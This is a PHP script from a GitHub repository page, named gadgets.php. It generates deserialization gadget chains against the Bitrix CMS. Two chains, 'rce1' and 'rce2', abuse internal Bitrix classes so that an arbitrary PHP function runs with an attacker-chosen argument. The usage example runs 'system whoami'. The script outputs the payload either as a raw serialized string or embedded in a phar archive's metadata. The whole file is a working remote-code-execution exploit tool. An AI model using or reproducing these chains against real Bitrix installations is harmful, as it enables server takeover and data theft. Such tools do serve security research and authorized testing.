-
Notifications
You must be signed in to change notification settings - Fork 11
/
gadgets.php
123 lines (92 loc) · 2.65 KB
/
gadgets.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
<?php
function gen($items) {
foreach ($items as $name => $props) {
$code = '';
if (strpos($name, "\\") !== false) {
$parts = explode("\\", $name);
$cls = array_pop($parts);
$ns = implode("\\", $parts);
$code .= "namespace $ns;\n";
} else {
$cls = $name;
}
$code .= "class $cls {\n";
foreach ($props as $prop) {
$code .= "\t";
if ($prop[0] === '*') {
$code .= "private $" . substr($prop, 1);
} else if ($prop[0] == '#') {
$code .= "protected $" . substr($prop, 1);
} else {
$code .= "public $" . $prop;
}
$code .= ";\n";
}
$code .= "\tfunction __set(\$name, \$value) { \$this->{\$name} = \$value; }\n";
$code .= "}";
eval($code);
}
}
function rce1($func, $arg) {
gen([
'Bitrix\Main\Entity\Result' => ['#isSuccess', '#errors'],
'Bitrix\Main\UserConsent\DataProvider' => ['#data'],
'CAdminDraggableBlockEngine' => ['#engines', '#args'],
]);
$a = new CAdminDraggableBlockEngine();
$a->engines = array(array('check' => $func));
$a->args = $arg;
$dp = new Bitrix\Main\UserConsent\DataProvider();
$dp->data = array($a, 'check');
$res = new Bitrix\Main\Entity\Result();
$res->errors = $dp;
$res->isSuccess = false;
return $res;
}
function rce2($func, $arg) {
gen([
'Bitrix\Main\Entity\Result' => ['#isSuccess', '#errors'],
'Bitrix\Main\DB\ArrayResult' => ['#resource', '#converters'],
'Bitrix\Main\Type\Dictionary' => ['#values'],
]);
$ar = new Bitrix\Main\DB\ArrayResult();
$ar->resource = array(array($arg));
$ar->converters = array($func);
$dict = new Bitrix\Main\Type\Dictionary();
$dict->values = $ar;
$res = new Bitrix\Main\Entity\Result();
$res->errors = $dict;
$res->isSuccess = false;
return $res;
}
if (count($argv) != 5) {
echo "Usage: php gadgets.php rce1|rce2 func arg raw|phar-name\n";
echo "Exampe: php gadgets.php rce1 system whoami raw\n";
echo " php gadgets.php rce2 system whoami test.phar\n";
die();
}
list($file, $gadget, $func, $arg, $enc) = $argv;
switch ($gadget) {
case 'rce1':
$data = rce1($func, $arg);
break;
case 'rce2':
$data = rce2($func, $arg);
break;
default:
echo "Unknown gadget: $gadget";
die();
}
switch ($enc) {
case 'raw':
echo serialize($data);
break;
default:
$phar = new Phar($enc);
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($data);
$phar->stopBuffering();
break;
}